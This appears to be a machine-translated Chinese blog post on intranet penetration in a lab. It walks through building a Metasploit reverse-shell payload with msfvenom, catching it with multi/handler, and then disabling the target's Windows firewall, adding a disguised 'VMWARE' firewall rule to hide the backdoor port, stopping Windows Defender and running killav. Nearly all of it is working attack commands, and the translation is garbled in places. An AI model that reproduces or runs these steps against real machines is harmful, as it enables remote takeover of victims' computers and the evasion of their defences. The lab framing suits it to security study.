当前位置:网站首页>Intranet information collection of Intranet penetration (I)
Intranet information collection of Intranet penetration (I)
2022-07-06 14:07:00 【Unknown white hat】
Catalog
Metasploit Intranet information collection
03 adopt shell Turn off firewall
04 Turn off antivirus software
Intranet information collection of Intranet penetration ( Two )_ Unknown white hat blog -CSDN Blog
Metasploit Intranet information collection
attack kali 192.168.0.103
Drone aircraft win7 192.168.0.105
01msf rebound shell
First generate a payload
msfvenom -p windows/x64/meterpreter/reverse_tcp LHOST=192.168.0.103 LPORT=4444 -f exe > shell.exe

02msf rebound shell
Configure the bounce session handler
use exploit/multi/handler
set payload windows/meterpreter/reverse_tcp
set lhost 192.168.0.103
set lport 4444
exploit

take payload Send it to the target machine to execute

Successful implementation

linux Can't recognize window Chinese characters can be garbled , Modify the code page (65001 It stands for UTF-8)

03 adopt shell Turn off firewall
shell(execute -f cmd -i -H)
netsh advfirewall set allprofiles state off ( Turn off firewall )
netsh advfirewall show allprofiles ( Check the firewall status )

Add firewall rules through policies to hide behaviors
netsh advfirewall set add rule name= "VMWARE" protocol=TCP dir=in localport=4444 action=allow
netsh firewall add portopening TCP 4444 "VMWARE" ENABLE ALL
Restart and take effect ( Make win7 restart ):
shutdown -r -f -t 0
04 Turn off antivirus software
close windefend
net stop windefend
Turn off antivirus software
run killav
run post/windows/manage/killav
边栏推荐
- 实验九 输入输出流(节选)
- Poker game program - man machine confrontation
- 7-9 制作门牌号3.0(PTA程序设计)
- 7-4 hash table search (PTA program design)
- How to turn wechat applet into uniapp
- Strengthen basic learning records
- Callback function ----------- callback
- The difference between abstract classes and interfaces
- The United States has repeatedly revealed that the yield of interest rate hiked treasury bonds continued to rise
- MATLAB打开.m文件乱码解决办法
猜你喜欢

Build domain environment (win)

Strengthen basic learning records

It's never too late to start. The tramp transformation programmer has an annual salary of more than 700000 yuan

网络层—简单的arp断网

Nuxtjs quick start (nuxt2)

Difference and understanding between detected and non detected anomalies

记一次api接口SQL注入实战
![[dark horse morning post] Shanghai Municipal Bureau of supervision responded that Zhong Xue had a high fever and did not melt; Michael admitted that two batches of pure milk were unqualified; Wechat i](/img/d7/4671b5a74317a8f87ffd36be2b34e1.jpg)
[dark horse morning post] Shanghai Municipal Bureau of supervision responded that Zhong Xue had a high fever and did not melt; Michael admitted that two batches of pure milk were unqualified; Wechat i

Renforcer les dossiers de base de l'apprentissage

Record once, modify password logic vulnerability actual combat
随机推荐
Harmonyos JS demo application development
Canvas foundation 1 - draw a straight line (easy to understand)
Nuxtjs快速上手(Nuxt2)
内网渗透之内网信息收集(一)
Intensive literature reading series (I): Courier routing and assignment for food delivery service using reinforcement learning
7-7 7003 组合锁(PTA程序设计)
Hackmyvm target series (5) -warez
7-3 构造散列表(PTA程序设计)
网络基础详解
It's never too late to start. The tramp transformation programmer has an annual salary of more than 700000 yuan
7-15 h0161. Find the greatest common divisor and the least common multiple (PTA program design)
[experiment index of educator database]
Get started with typescript
实验四 数组
HackMyvm靶机系列(3)-visions
HackMyvm靶机系列(5)-warez
实验九 输入输出流(节选)
Have you encountered ABA problems? Let's talk about the following in detail, how to avoid ABA problems
7-9 make house number 3.0 (PTA program design)
Applet Web Capture -fiddler